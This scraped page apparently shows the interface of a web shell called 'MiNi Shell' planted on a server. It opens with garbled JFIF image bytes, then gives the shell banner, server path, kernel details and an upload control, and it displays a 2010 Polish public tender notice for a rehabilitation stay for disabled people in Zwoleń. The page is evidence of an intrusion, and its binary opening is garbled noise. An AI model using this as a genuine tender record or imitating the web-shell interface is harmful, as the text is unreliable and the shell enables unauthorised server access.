JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100917/296104-N-2010.html

<p class="kh_header"><b>Zwoleń: Organizacja i przeprowadzenie turnusu  rehabilitacyjnego z przeprowadzeniem treningu kompetencji i umiejętności społecznych  dla osób niepełnosprawnych współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego oraz budżetu państwa realizowanego  w ramach  Programu Operacyjnego Kapitał Ludzki, Priorytet VII. Promocja Integracji Społecznej Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji .Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez Powiatowe Centra Pomocy Rodzinie, projekt systemowy  My samodzielni</b><br>
<b>Numer ogłoszenia: 296104 - 2010; data zamieszczenia: 17.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Zwoleniu , ul. Władysława Jagiełły 4, 26-700 Zwoleń, woj. mazowieckie, tel. 48 676 33 89 wew. 15, faks 48 676 36 23.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.zwolen.finn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostki organizacyjne  administracji samorządowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie turnusu  rehabilitacyjnego z przeprowadzeniem treningu kompetencji i umiejętności społecznych  dla osób niepełnosprawnych współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego oraz budżetu państwa realizowanego  w ramach  Programu Operacyjnego Kapitał Ludzki, Priorytet VII. Promocja Integracji Społecznej Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji .Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez Powiatowe Centra Pomocy Rodzinie, projekt systemowy  My samodzielni.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem niniejszego zamówienia jest zorganizowanie i przeprowadzenie 14 dniowego turnusu rehabilitacyjno dla 26 osób  niepełnosprawnych, bezrobotnych lub nieaktywnych zawodowo  połączonego  z treningiem kompetencji i umiejętności społecznych   w ośrodku rehabilitacyjnym  położonym w górach na terenie kraju.
2.Usługi powinny być wykonywane zgodnie z przepisami rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 r. w sprawie turnusów rehabilitacyjnych ( Dz. U. Nr 230, poz. 1694).
3.Wykonawca w ofercie cenowej uwzględnia cenę dla max. liczby uczestników. W przypadku uczestnictwa  mniejszej liczby osób Zamawiający dokona zapłaty za faktyczną ilość osób uczestniczącą w turnusie .
4. Założenia organizacyjne  turnusu rehabilitacyjnego:
1) Ogólna poprawa lub podtrzymanie sprawności psychofizycznej;
2) Rozwijanie umiejętności społecznych i samorealizacji uczestników;
3) Poprawa stanu zdrowia, samopoczucia i sprawności fizycznej;
4) Prowadzenie zabiegów leczniczo usprawniających;
5) Wyrabianie zaradności osobistej;
6)Wzbogacenie komunikacji interpersonalnej;
7) Podniesienie poczucia własnej wartości;
8) Rozwój umiejętności współpracy, wdrażanie do współdziałania, integracja grupy;
9) Twórcze wykorzystanie własnego potencjału w aktywności społecznej i zawodowej;
10) Umożliwienie pełnego wypoczynku fizycznego i psychicznego;
5. Wykonawca będący organizatorem  zapewni uczestnikom turnusu:
1) Kadrę gwarantującą prawidłową organizację turnusu w tym:  kierownika turnusu ,opiekunów,psychologa i  licencjonowanego doradcę zawodowego, 
2) Łączny czas zorganizowanych zajęć indywidualnych i grupowych na turnusie w  tym: 
- rehabilitację fizyczną dostosowaną do wieku kuracjuszy, stopnia i rodzaju ich  
 niepełnosprawności zgodnie z potrzebami osób niepełnosprawnych, zabiegi lecznicze;
- rehabilitację psychiczną w tym: zajęcia socjoterapeutyczne o tematyce zajęć związanych z zagadnieniami dotyczącymi usprawnienia funkcjonowania w kontaktach interpersonalnych, poradnictwo indywidualne i grupowe rozwijające świadomości kuracjuszy na temat indywidualnych schorzeń oraz pogłębianie wiedzy na temat placówek wspomagających osoby niepełnosprawne, pogadanki na temat problemów z jakimi najczęściej stykają się osoby niepełnosprawne, przedstawienie sposobów ich rozwiązywania, rozwijanie u kuracjuszy poczucia własnej wartości oraz sensu życia;
- zajęcia integracyjno- adaptacyjne w tym: wieczorki taneczne,   ogniska, grillowanie;
- zajęcia kulturalno -oświatowe, dydaktyczne i wychowawczo-profilaktyczne w tym: projekcje filmów, pogadanki profilaktyczne z lekarzem  na tematy schorzeń kuracjuszy oraz sposobów na samousprawnianie funkcjonowania własnego organizmu;
- zajęcia sportowo - rekreacyjne w tym:  ćwiczenia, wycieczki piesze krajoznawcze, gimnastyka ogólnorozwojowa, zajęcia rekreacyjne np. na basenie;
6. Trening kompetencji i umiejętności społecznych w tym:
a)	zajęcia z psychologiem - 10 godzin dydaktycznych;
b)	zajęcia z doradcą zawodowym - 10 godzin dydaktycznych;
c)	zajęcia rehabilitacyjne; min. 2 zabiegi dziennie
7.Zajęcia z psychologiem, doradcą zawodowym  powinny odbywać  w 2  grupach, natomiast zajęcia rehabilitacyjne w systemie indywidualnym.
8. Ponadto Wykonawca zobowiązuje się do:
1)  Zapewnienia opieki medycznej w tym: stałą opiekę pielęgniarską i korzystanie z opieki lekarskiej podczas turnusu.
2) Zakwaterowania w ośrodku w pokojach 1, 2 lub 3 osobowych z pełnym węzłem sanitarnym tj: umywalka, prysznic, wc. Każdy pokój musi być wyposażony w TV oraz czajnik bezprzewodowy ( Zamawiający nie dopuszcza zakwaterowania uczestników turnusu  w  domkach)
3) Całodziennego wyżywienia w skład którego wchodzą: śniadanie, obiad, kolacja w tym: śniadanie ( szwedzki stół,) w godzinach od 7:30 do 9:30: minimum jedno danie ciepłe, przekąski zimne, pieczywo jasne i ciemne, napoje gorące, soki owoce warzywa. 
Obiad: dwudaniowy z deserem
Kolacja: minimum jedno danie ciepłe, przekąski zimne, pieczywo jasne i ciemne, napoje gorące, soki, owoce, warzywa.
Dwie przerwy kawowe ( przed południem i po południu): kawa, herbata, woda, soki, ciasto, owoce;
4) Ośrodek, w którym będą zakwaterowani uczestnicy turnusu musi posiadać stołówkę.
5) Dokonania rekompensaty za śniadanie w dniu rozpoczęcia turnusu dla każdego uczestnika turnusu  w formie zamiennika na ognisko z produktami grillowanymi ( np. kiełbasa, karkówka) a w przypadku złej pogody spotkanie całej grupy np. na świetlicy
6)Dokonania rekompensaty za kolację w dniu zakończenia turnusu dla każdego uczestnika turnusu  w formie zabezpieczenia suchego prowiantu na czas podróży.
7) Transportu uczestników  na miejsce turnusu i w drodze powrotnej  środkiem transportu przystosowanym dla osób niepełnosprawnych, niskopodłogowy, z WC, klimatyzacją, telewizorem, minibarkiem.
8) Zamawiający wymaga aby opiekun grupy turnusowej  Wykonawcy odebrał uczestników z siedziby Zamawiającego  w Zwoleniu i opiekował  się nimi podczas podróży.
9) Opłacenia opłaty uzdrowiskowej za wszystkich uczestników turnusu jeśli wymagać będzie tego lokalizacja ośrodka.
10) Całodobowego 14 dniowego ubezpieczenia NNW dla każdego uczestnika turnusu  obejmujące dojazd uczestników turnusu z miejsca zamieszkania do miejsca odbywania się turnusu oraz dojazd z miejsca odbywania się turnusu do miejsca zamieszkania ,  dojazdu do ośrodka szkoleniowego.
9.Zamawiający zastrzega sobie prawo do dokonania wizji na terenie ośrodka zgłoszonego w dokumentach przetargowych celem określenia zgodności opisu ze stanem faktycznym.
10.Wymagania dotyczące ośrodka.
1) Ośrodek przyjmujący osoby niepełnosprawne na turnus rehabilitacyjny musi posiadać wpis do rejestru ośrodków o którym mowa w § 17 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 r. w sprawie turnusów rehabilitacyjnych ( Dz. U. z dnia 11 grudnia 2007 r,). Zawiadomienie o wpisie do rejestru ośrodków powinno zawierać informacje o rodzajach realizowanych turnusów rehabilitacyjnych w tym o turnusie rehabilitacyjnym usprawniająco- rekreacyjnym.
2) Ośrodek który jest przystosowany do przyjmowania osób ze schorzeniami takimi jak: upośledzenie umysłowe, choroba psychiczna, epilepsja, cukrzyca, choroby neurologiczne, choroby układu krążenia, choroby układu oddechowego, zaburzenia głosu i mowy, choroby układu ruchu.

11. Zamawiający zastrzega również, iż do obowiązków Wykonawcy będzie należało:
1) Niezwłoczne zawiadomienie Zamawiającego o każdym przypadku przerwania turnusu rehabilitacyjnego przez jego uczestnika.
2) Wystawienie po zakończeniu turnusu rehabilitacyjnego faktury w terminie do 30 dni.
3).Dokonania zwrotu w wysokości kosztów w przypadku rezygnacji osoby niepełnosprawnej z uczestnictwa w turnusie przed jego rozpoczęciem lub stwierdzenia w wyniku kontroli rażących uchybień w zakresie realizacji tego turnusu.
4)Dokonania zwrotu w wysokości proporcjonalnej do liczby niewykorzystanych dni w przypadku skrócenia z przyczyn losowych pobytu osoby niepełnosprawnej na turnusie w  wymiarze co najmniej połowy czasu trwania tego turnusu.
5) Ustawienia w widocznym miejscu tablicy informacyjnej o dofinansowaniu ze środków EFS pobytu uczestników na turnusie osób niepełnosprawnych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w niniejszym postępowaniu nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony gdy  wykonawcy, przedłożą aktualny wpis do rejestru ośrodków OD przyjmujących grupy turnusowe i rejestru organizatorów turnusu OR poświadczające, że Wykonawca jest uprawniony do prowadzenia turnusów dla osób niepełnosprawnych o których mowa w rozporządzeniu Ministra Pracy i Polityki Socjalnej  z dnia 15 listopada 2007 roku w sprawie turnusów rehabilitacyjnych ( Dz. U. Nr 230 poz. 1694)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien udokumentować posiadanie wiedzy i doświadczenia poprzez wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert  jeżeli okres   prowadzenia działalności jest krótszy w tym okresie  odpowiadające swoim   rodzajem usługom  stanowiącym przedmiot zamówienia iż  wykonał minimum   2  usługi   polegające na  zorganizowaniu i przeprowadzeniu turnusu rehabilitacyjnego dla  minimum 25 osób niepełnosprawnych. 
Wykonawca  zobowiązany jest dołączyć dokumenty ( np. referencje) potwierdzające  że  przeprowadzone usługi   z uwzględnieniem w/w wymogów zostały wykonane należycie.
Ocena spełnienia tego warunku zostanie dokonana na podstawie dokumentów załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku Wykonawca zobowiązany jest wykazać, że dysponuje odpowiednimi warunkami techniczno-organizacyjnymi,  potencjałem technicznym niezbędnym do wykonywania zabiegów rehabilitacyjnych.
Ocena spełnienia tego warunku zostanie dokonana na podstawie dokumentów załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku Wykonawca winien wykazać, iż dysponuje kadrą rehabilitacyjną zdolną do wykonania zamówienia, posiadającą wymagane uprawnienia, jeśli ustawy nakładają obowiązek posiadania takich uprawnień,  oraz dysponuje:
- psychologiem lub osobą  posiadająca  wykształcenie wyższe magisterskie  i posiadająca kwalifikacje uprawniające do prowadzenia zajęć.
- Licencjonowanym doradcą zawodowym
Ocena spełnienia tego warunku zostanie dokonana na podstawie dokumentów załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien udokumentować znajdowanie się w sytuacji ekonomicznej i finansowej umożliwiającej realizację niniejszego zamówienia poprzez posiadanie opłaconej polisy lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia i mienia, na jedno lub wszystkie zdarzenia na sumę gwarancyjną nie mniejszą niż 100 000 zł.
Ocena spełnienia tego warunku zostanie dokonana na podstawie dokumentów załączonych do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów;
2.Oświadczenie o spełnieniu warunków udziału w postępowaniu 
3.Wypełniony formularz ofertowy zgodnie z załącznikiem Nr 1 do SIWZ;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, w sytuacji gdy dotyczy ona:
a)zmiany terminu realizacji zamówienia - w sytuacji gdy zmiana ta wynika z przyczyn niezależnych od Wykonawcy;
b)zmniejszenia  liczby osób przewidzianych do uczestniczenia w danym turnusie.
c)Zmiany osobowe: zmiana osób przy pomocy których Wykonawca realizuje przedmiot umowy, na inne legitymujące się co najmniej równoważnym doświadczeniem lub kwalifikacjami, o których mowa w SIWZ. Wykonawca może dokonać zmiany osób przedstawionych w ofercie, jedynie za uprzednią zgodą Zamawiającego w przypadkach:
- śmierci, choroby lub innych zdarzeń losowych,
- nie wywiązywania się osób z obowiązków wynikających z umowy,
- rezygnacji tych osób z wykonywania swoich obowiązków
Zmiany osobowe nie powodują konieczności wprowadzenia aneksu  do umowy, ale wymagają pisemnego powiadomienia Zamawiającego o proponowanej zmianie wraz z uzasadnieniem i załączeniem listy nowych osób wraz z dokumentami potwierdzającymi kwalifikacje, oraz oświadczeniem, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają wymagane uprawnienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr.zwolen.finn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie
ul. Wł. Jagiełły 4
26-700 Zwoleń
pok. Nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2010 godzina 11:00, miejsce: Powiatowe Centrum Pomocy Rodzinie
ul. Wł. Jagiełły 4
26-700 Zwoleń
pok. Nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego oraz budżetu państwa realizowanego  w ramach  Programu Operacyjnego Kapitał Ludzki, Priorytet VII. Promocja Integracji Społecznej Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji .Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez Powiatowe Centra Pomocy Rodzinie, projekt systemowy My samodzielni.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com